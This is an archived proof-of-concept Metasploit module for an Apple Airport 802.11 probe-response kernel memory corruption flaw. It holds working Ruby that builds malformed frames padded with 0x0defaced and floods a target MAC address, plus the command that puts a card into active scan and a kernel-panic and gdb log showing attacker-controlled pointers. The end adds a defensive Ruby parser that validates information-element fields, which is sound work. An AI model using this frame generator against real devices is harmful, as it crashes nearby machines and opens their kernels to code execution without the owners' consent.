
Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit)

Author: H D Moore
Platform: hardware
Release date: 2006-11-01

# A proof-of-concept exploit has been added to the Metasploit Framework 3.0 source tree:
# msf > use auxiliary/dos/wireless/daringphucball

require 'msf/core'

module Msf

class Auxiliary::Dos::Wireless::DaringPhucball < Msf::Auxiliary

	include Exploit::Lorcon


	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Apple Airport 802.11 Probe Response Kernel Memory Corruption',
			'Description'    => %q{
				The Apple Airport driver provided with Orinoco-based Airport cards (1999-2003 PowerBooks, iMacs)
				is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning 
				mode, a malformed probe response frame can be used to corrupt internal kernel structures, leading
				to arbitrary code execution. This vulnerability is triggered when a probe response frame is received
				that does not contain valid information element (IE) fields after the fixed-length header. The data 
				following the fixed-length header is copied over internal kernel structures, resulting in memory 
				operations being performed on attacker-controlled pointer values.
			},
			
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 3666 $'
		))
		register_options(
			[
				OptInt.new('COUNT', [ true, "The number of frames to send", 2000]),
				OptString.new('ADDR_DST', [ true,  "The MAC address of the target system"])
			], self.class)					
	end

	#
	# This bug is easiest to trigger when the card has been placed into active scan mode:
	# $ /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s -r 10000
	#

	def run
		open_wifi
		
		cnt = datastore['COUNT'].to_i

		print_status("Creating malicious probe response frame...")		
		frame = create_frame()
		
		print_status("Sending #{cnt} frames...")
		0.upto(cnt) { |i| wifi.write(frame)	}
	end
	
	def eton(addr)
		addr.split(':').map { |c| c.hex.chr }.join
	end

	def create_frame
		bssid    = Rex::Text.rand_text(6)
		seq      = [rand(255)].pack('n')
		caps     = [rand(65535)].pack('n')
		
		frame = 
			"\x50" +                      # type/subtype
			"\x00" +                      # flags
			"\x00\x00" +                  # duration  
			eton(datastore['ADDR_DST']) + # dst
			bssid +                       # src
			bssid +                       # bssid
			seq   +                       # seq  
			Rex::Text.rand_text(8) +      # timestamp value
			Rex::Text.rand_text(2) +      # beacon interval
			Rex::Text.rand_text(2)        # capabilities
		
		frame << [0x0defaced].pack('N') * ((1024-frame.length) / 4)
		
		return frame

	end	
end
end	

=begin

Tested on a 1.0Ghz PowerBook running 10.4.8 with the latest updates (Halloween, 2006)

Unresolved kernel trap(cpu 0): 0x300 - Data access DAR=0x000000000DEFACF7 PC=0x00000000007A2260
Latest crash info for cpu 0:
   Exception state (sv=0x3AA12A00)
      PC=0x007A2260; MSR=0x00009030; DAR=0x0DEFACF7; DSISR=0x40000000; LR=0x007A1D48; R1=0x17443B60; XCP=0x0000000C (0x300 - Data access)
      Backtrace:
0x01BC80AC 0x007A1D48 0x0079FA54 0x0079FF94 0x0079FEBC 0x002D0B94
         0x002CFA5C 0x000A9314
      Kernel loadable modules in backtrace (with dependencies):
         com.apple.driver.AppleAirPort(3.4.4)@0x797000
            dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x5f8000
Proceeding back via exception chain:
   Exception state (sv=0x3AA12A00)
      previously dumped as "Latest" state. skipping...
   Exception state (sv=0x31F13A00)
      PC=0x00000000; MSR=0x0000D030; DAR=0x00000000; DSISR=0x00000000; LR=0x00000000; R1=0x00000000; XCP=0x00000000 (Unknown)

Kernel version:
Darwin Kernel Version 8.8.0: Fri Sep  8 17:18:57 PDT 2006; root:xnu-792.12.6.obj~1/RELEASE_PPC



(gdb) showcurrentstacks
task        vm_map      ipc_space  #acts   pid  proc        command
0x01a73dd8  0x00cdaf3c  0x01a68ef0   38      0  0x003fb200  kernel_task
            activation  thread      pri  state  wait_queue  wait_event
            0x01a7c000  0x01a7c000   82  R
                reserved_stack=0x173b0000
                kernel_stack=0x17440000
                stacktop=0x17443b60
                0x17443b60  0x1bc80ac
                0x17443be0  0x7a1d48 <com.apple.driver.AppleAirPort + 0xad48>
                0x17443c60  0x79fa54 <com.apple.driver.AppleAirPort + 0x8a54>
                0x17443ce0  0x79ff94 <com.apple.driver.AppleAirPort + 0x8f94>
                0x17443d90  0x79febc <com.apple.driver.AppleAirPort + 0x8ebc>
                0x17443df0  0x2d0b94 <_ZN22IOInterruptEventSource12checkForWorkEv+184>
                0x17443e40  0x2cfa5c <_ZN10IOWorkLoop10threadMainEv+104>
                0x17443e90  0xa9314 <Call_continuation+20>
                stackbottom=0x17443e90


(gdb) x/3i $pc
0x7a2260 <mhp.1762+3571640>:    lbz     r8,0(r2)
0x7a2264 <mhp.1762+3571644>:    addi    r2,r2,1
0x7a2268 <mhp.1762+3571648>:    stw     r2,0(r11)

(gdb) i r $r2
r2             0xdefacf7        233811191

(gdb) x/x $r11
0x17443bb8:     0x0defacf7


(gdb) bt
#0  0x007a2260 in mhp.1762 ()
#1  0x007a1d48 in mhp.1762 ()
warning: Previous frame identical to this frame (corrupt stack?)
#2  0x007a1d48 in mhp.1762 ()
#3  0x0079fa54 in mhp.1762 ()
#4  0x0079ff94 in mhp.1762 ()
#5  0x0079febc in mhp.1762 ()
#6  0x002d0b94 in IOInterruptEventSource::checkForWork (this=0x1d80d40) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOInterruptEventSource.cpp:196
#7  0x002cfa5c in IOWorkLoop::threadMain (this=0x1d803c0) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOWorkLoop.cpp:267


(gdb) x/40x $r1
0x17443b60:     0x17443be0      0x22424022      0x01bc80ac      0x00000038
0x17443b70:     0x00d43c54      0x0004ffff      0x01bc81f4      0x00000210
0x17443b80:     0x02275000      0x003d8000      0x004fa418      0x00365000
0x17443b90:     0x01d803c0      0x00033e88      0x01a7c01c      0x01a7c0a4
0x17443ba0:     0x0defaced      0x01bc8000      0x0227581e      0x0defacf7
0x17443bb0:     0x00000000      0x0227581e      0x0defacf7      0x00000001
0x17443bc0:     0x00000002      0x01bc81f4      0x00000000      0x00000000
0x17443bd0:     0x17443c10      0x01a858c0      0x17443be0      0x01d80d40
0x17443be0:     0x17443c60      0x01bc81f4      0x007a1d48      0x00000000
0x17443bf0:     0x17443c20      0x00008088      0x01bc8000      0x0227581e

=end

# milw0rm.com [2006-11-01]
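The description in the module above says the driver copied whatever followed the fixed-length header without checking that it was a valid run of information elements. As an added defender-side example (not code from the original module or from Metasploit), the following Ruby does the check a receiver should make: it walks the IE TLVs after the 24-byte MAC header and the 12 bytes of fixed fields and rejects frames whose bytes do not form well-formed IEs. The frame layout, helper names and sample frames are assumptions constructed for the example.

```ruby
MAC_HDR_LEN = 24
FIXED_LEN   = 8 + 2 + 2   # timestamp + beacon interval + capabilities
PROBE_RESP  = 0x50        # first frame-control byte of a probe response

# Returns an array of [id, payload] pairs, or raises ArgumentError naming the defect.
def parse_probe_response(frame)
  frame = frame.b
  raise ArgumentError, "frame too short" if frame.bytesize < MAC_HDR_LEN + FIXED_LEN
  raise ArgumentError, "not a probe response" unless frame.getbyte(0) == PROBE_RESP
  body = frame.byteslice(MAC_HDR_LEN + FIXED_LEN, frame.bytesize)
  ies  = []
  off  = 0
  while off < body.bytesize
    # every IE needs a 2-byte id/length header ...
    raise ArgumentError, "truncated IE header at #{off}" if body.bytesize - off < 2
    id, len = body.getbyte(off), body.getbyte(off + 1)
    # ... and its declared length must stay inside the frame
    raise ArgumentError, "IE #{id} length #{len} overruns frame" if off + 2 + len > body.bytesize
    ies << [id, body.byteslice(off + 2, len)]
    off += 2 + len
  end
  ies
end

def valid_probe_response?(frame)
  parse_probe_response(frame)
  true
rescue ArgumentError
  false
end

# Constructed 36-byte fixed portion shared by both samples (addresses are dummies).
def fixed_portion
  ("\x50\x00\x00\x00" + "\xff" * 6 + "\x00\x11\x22\x33\x44\x55" * 2 + "\x10\x00" +
   "\x00" * 8 + "\x64\x00" + "\x01\x04").b
end

# Well-formed: an SSID IE ("demo") followed by a supported-rates IE.
def good_frame
  fixed_portion + [0, 4].pack('CC') + "demo" + [1, 4, 0x82, 0x84, 0x8b, 0x96].pack('C*')
end

# Malformed the way the module above builds it: the IE area is filler words, not
# TLVs, so the first "length" byte (0xef) already points past the end of the frame.
def bad_frame
  fixed_portion + ([0x0defaced].pack('N') * 10)
end
```

A frame with no IEs at all parses as an empty list, which is the one case a driver must then handle explicitly rather than assuming an SSID is present.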